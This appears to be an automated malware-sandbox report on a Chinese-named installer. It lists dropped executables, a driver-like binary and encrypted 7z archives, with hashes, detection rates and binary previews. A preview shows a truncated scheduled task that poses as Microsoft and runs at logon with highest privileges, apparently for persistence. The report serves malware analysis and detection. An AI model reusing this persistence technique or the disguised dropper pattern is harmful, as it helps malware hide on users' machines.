C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | malicious | Unknown
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):831200
                                            Entropy (8bit):6.671005303304742
                                            Encrypted:false
                                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                            Joe Sandbox View:
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1676128
                                            Entropy (8bit):7.999880527528529
                                            Encrypted:true
                                            SSDEEP:49152:C9rTE8S5idrQh2Xab/c0wU9/FE6HchcDQb809:C9rT4elr+/GKceDs809
                                            MD5:A5D59F9E5E103C7D459C9A066156C027
                                            SHA1:EEC38E0CDFFC853F444D8D44B98C360016818D37
                                            SHA-256:EFBD385F8A8C154A5BABC3BD4CD7FC45C9C838BFFE1E0CA11E7B136F2E8E3C04
                                            SHA-512:28A92FD2EFFB559F073D6A853C66EF9371B9EEB18C8629896134F84384D5439FAC7B11EFDF36DD7A3DBFAB455704A50F3B63EB5574E3B3BF5B4DAC05B319EB85
                                            Malicious:false
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):3621376
                                            Entropy (8bit):7.006090025798393
                                            Encrypted:false
                                            SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                            MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                            SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                            SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                            SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 26%
                                            • Antivirus: Virustotal, Detection: 38%, Browse
                                            Joe Sandbox View:
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe, Detection: malicious, Browse
                                            • Filename: #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe, Detection: malicious, Browse
                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1676128
                                            Entropy (8bit):7.999880527528529
                                            Encrypted:true
                                            SSDEEP:49152:C9rTE8S5idrQh2Xab/c0wU9/FE6HchcDQb809:C9rT4elr+/GKceDs809
                                            MD5:A5D59F9E5E103C7D459C9A066156C027
                                            SHA1:EEC38E0CDFFC853F444D8D44B98C360016818D37
                                            SHA-256:EFBD385F8A8C154A5BABC3BD4CD7FC45C9C838BFFE1E0CA11E7B136F2E8E3C04
                                            SHA-512:28A92FD2EFFB559F073D6A853C66EF9371B9EEB18C8629896134F84384D5439FAC7B11EFDF36DD7A3DBFAB455704A50F3B63EB5574E3B3BF5B4DAC05B319EB85
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):56530
                                            Entropy (8bit):7.99718779846658
                                            Encrypted:true
                                            SSDEEP:1536:739J1GGcyRSPpLJDG96df03+XVrquIeYE3JI:73VSygPp5GU03sVrRYEG
                                            MD5:C543AB5E4E1259A032C1A8409D41EB01
                                            SHA1:C860FE9B372DE808AC21EFDB7C01E4590D6D8146
                                            SHA-256:2A8BBCE4FDB9CB4F66E7CAACEC53A8C6CF94476113283B8CC170836689E8416A
                                            SHA-512:67F7B57DE241B247410233BE0B6641F483D0C30BDD67BC16F7EB41792B900C80D6884D4B3EBC4ADF8FD678467C6A59FD67E4456CF5AA686A3ECFF9E2DB04FC93
                                            Malicious:false
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):56530
                                            Entropy (8bit):7.997187798466584
                                            Encrypted:true
                                            SSDEEP:1536:8YpC7sShwCOb2MCH6eNF83JO5tNIMgiMRF8rMC+:T4K2MCH6edzNIMFMLAMC+
                                            MD5:F901ACE8EF84F275D5BE15DF6598C24C
                                            SHA1:4A94B54CB0194D52157E1ADC2EAA643C3337E138
                                            SHA-256:90FAF1B0A25363DE038DF758442FC2E0A4F52332BFE36A63A4FFA9A6FC0141F5
                                            SHA-512:0E5C4551C8143B429F267D0E90D8E1AEFCBC5AE138954BC9E1AB17D5E181B878F1A85FA55CDA7B7697E33E1114BA9A2B4DE499D91D8B86F9B2B8D60486FCCFA3
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):56546
                                            Entropy (8bit):7.996966859255975
                                            Encrypted:true
                                            SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                            MD5:CEA69F993E1CE0FB945A98BF37A66546
                                            SHA1:7114365265F041DA904574D1F5876544506F89BA
                                            SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                            SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                            Malicious:false
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):56546
                                            Entropy (8bit):7.996966859255979
                                            Encrypted:true
                                            SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                            MD5:4CB8B7E557C80FC7B014133AB834A042
                                            SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                            SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                            SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):31890
                                            Entropy (8bit):7.99402458740637
                                            Encrypted:true
                                            SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                            MD5:8622FC7228777F64A47BD6C61478ADD9
                                            SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                            SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                            SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                            Malicious:false
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):31890
                                            Entropy (8bit):7.99402458740637
                                            Encrypted:true
                                            SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                            MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                            SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                            SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                            SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):74960
                                            Entropy (8bit):7.99759370165655
                                            Encrypted:true
                                            SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                            MD5:950338D50B95A25F494EE74E97B7B7A9
                                            SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                            SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                            SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                            Malicious:false
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):74960
                                            Entropy (8bit):7.997593701656546
                                            Encrypted:true
                                            SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                            MD5:059BA7C31F3E227356CA5F29E4AA2508
                                            SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                            SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                            SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                            Malicious:false
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):29730
                                            Entropy (8bit):7.994290657653607
                                            Encrypted:true
                                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                            Malicious:false
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):29730
                                            Entropy (8bit):7.994290657653608
                                            Encrypted:true
                                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                            Malicious:false
                                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:7-zip archive data, version 0.4
                                            Category:dropped
                                            Size (bytes):1676128
                                            Entropy (8bit):7.999880527528534
                                            Encrypted:true
                                            SSDEEP:49152:6jJ02hc8V622MtAIbUYI66AEocdfyFH/LJ:6N0ec8V62TGfc2T5W/9
                                            MD5:A14A4C056F1A4534901E4935570C4F48
                                            SHA1:BA84CC3B67C8DCA8D3C97C2DA8E3FAF6CABE8174
                                            SHA-256:85F05D2CB6D24DCAE2567E018E7FDE529AD5C84E65F305A39BECD1F0D117AC0D
                                            SHA-512:BB3C0AA15F42C0B75AB1D31273816C1B2026672F97219C987815E3F0A215CE22881330C4EE707258C61B3BCBA0843932DC97EEAFE53B710EBBA2F7FF35E52DE7
                                            Malicious:false
                                            Preview:7z..'...............@........4.)yp.y[r..4{...P...G..E.B..:..Z..Q.I?1..Vv...8.....i..y...Dg.r@U..7...K....I..........g..&.....n..0\...W.X..IY..6o.....l7`./....Y.N.>./*2T.A.,...e......_v...80...'<.^.j.z_..:s.)'~.\. .V.t...$.y.......~..9S...m.F......h..KE2k<.....2.k...#...f0.....|"\u...J...C..!@../X....;.#..m._..YO.y....!..z..........D...m.....z._i.......z.....%..U..Q6"..6.ZG..^.0[....qY....Um..r..b.<Tg.s...y..F.v.<i(.J..U.a...|....hL.T..*...t.._..I.x.0<3......0.x..j]b.../.T..y..A.....(.\\...Q....)...a..@...Q.1..../....i...M.?.*...lZ..(..g.]....$}....c......,.*1....!.o[<.........HXJ..t.P.A=....7.GM.........1h.D....]sg.....+.*`:...i..lT.\.Vb._..e"l9!v..$.).n..........>l.w.m..|}.IZ.....9.p..C.|PP\.W.._G|...........469....=I..SP..$....."..j....o!...|%.x/K....[Z.....hMM5....M.V/'+.6.o..tWOSGQW..J..U"....3.7.YH.N\]..w.h......x......?^.....n..S.8.........2`........?..l.l/.R.Y.F...;.Uf&../2.......v..&.lEV....r3..H.......9..t.e|..."...%.......i..~.
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):63640
                                            Entropy (8bit):6.482810107683822
                                            Encrypted:false
                                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 9%
                                             • Antivirus: Virustotal, Detection: 6%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                                            Process:C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):4096
                                            Entropy (8bit):3.3443983145211007
                                            Encrypted:false
                                            SSDEEP:48:dXKLzDlnyL6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnHwhldOVQOj6dKbKsz7
                                            MD5:1E67E91688292692932CD9096EDEA2BD
                                            SHA1:AA8859477C235F2F194FC7C4D75EF4C082A6864B
                                            SHA-256:ED20E6ED002708041CC98B046F976B2BE43685B258AE6461F291CF73F7128924
                                            SHA-512:7C6DE3E403542FE6D33C75F286212A114C7112B8401EAC8323EDBE856CADE905CE11E0B9C4083AE01A711E6B1EC12329CBF43AB0B585BCB56FE8A0F151B47B3E
                                            Malicious:false
                                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAva
                                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1426032
                                            Entropy (8bit):7.9998542527026695
                                            Encrypted:true
                                            SSDEEP:24576:8tTH+7iBbbOvhHw2pyblBmyLZbeVJEOgKmCAhFFgLcPBfROlaqH3E5s5bk9HVN8V:8N+A4hH/mwihqEOChFFgLcZ5OlHH3E5G
                                            MD5:693BFF71A8287B9288D546808FE0E6B0
                                            SHA1:9731E1120AE905A97DAF9ACF9FCC3BD3CADBF4E8
                                            SHA-256:BA5CEEE2D0762403546C92509142146F68826B19A74D8C62722CC696BC24C257
                                            SHA-512:CB82F8A0A52DADB848849F84DC6E9A6A809308AD06EB2DA1413927F583ED913966A2654BE1A55A2B2DA3A9B330E523303E8408DB1C6C492BB3B84F2486C9DC16
                                            Malicious:false
                                            Preview:.X.m...Z...vaX.%....%2.-......@$....-9.T=..f...E.0e....!G7....u.?.z..P.kvE..3....7[+......A....+xJ.......7..*.i.q8.OC.[ac..qs ....,9kV.@.px.Ye..`.....o...ol.7...[....k.[[w..^|.A........o+u.y.|.t.hN:Y....Z.G...x.I.Z+.Z...r....#.4pZ.....*$..X`.W....:.=.........0..i"R.k..1..q.....4..i.U...t.q$.W\... l........(vsBs.*Q..o.M@.;..Qd.....v...B..*..U.@.J^..s....!.j1f.6.h?.....B..S..3.y...:.a.V.....mP.....1n..#I...^.y..o.......J.*5..U...,.Y.Q.Pc.}=.&/.Gt.1.:....E...K.iB6.,.BG.r...5.Q.\...)g*i..5.O.]|\.<.;i..R....d!..q./B n(..j>..hD..... $2.9+H.....6.....~(.^.K.4Ed.......s.A....5..v,.y(...h.8....=.P.DM......../......Go..'.w&.........(h|..#..9D;qt.....Y%.v:..5c.6..........6a..`.p.....*y.(.1GC>.f.Z.1...[.r.X|.....q..z......\F.. ..H.....Q.c.r..^I...1.1b.U0..r4e. .<..kY..2' ._.....U.....T......m...a*..'_.Y.E..gb.....g....LL.%VmaN6[..C+.....4Y.S.s${.B.....-....,..6.N..N...b.{.x..u......h....J;W.=eY...H..pE{.......D1.J@.uhLx..%...f4.:oO-.^T#..vi.+.c~.x..B..
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllul7got/Z:NllUkot
                                            MD5:71995B6B43EA2A2D49079E9E99E8D184
                                            SHA1:A55CE57E044A814007D3EE7DCCF1527EF391036A
                                            SHA-256:FD011C1349ABA970E984930A34129F61F60BF70A92E4E1748C4DCFFA3E22DFBF
                                            SHA-512:6CFBFC9B41995E53733EDCEC9747C4B7EA800D267145D6A879637CBC2B96E06C1D8CFEE9CDC59A6E57A32AEFE5A941448A029B16F4B2A11EF8CC0F579352509A
                                            Malicious:false
                                            Preview:@...e................................................@..........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp
                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):6144
                                            Entropy (8bit):4.720366600008286
                                            Encrypted:false
                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                             • Antivirus: Virustotal, Detection: 0%
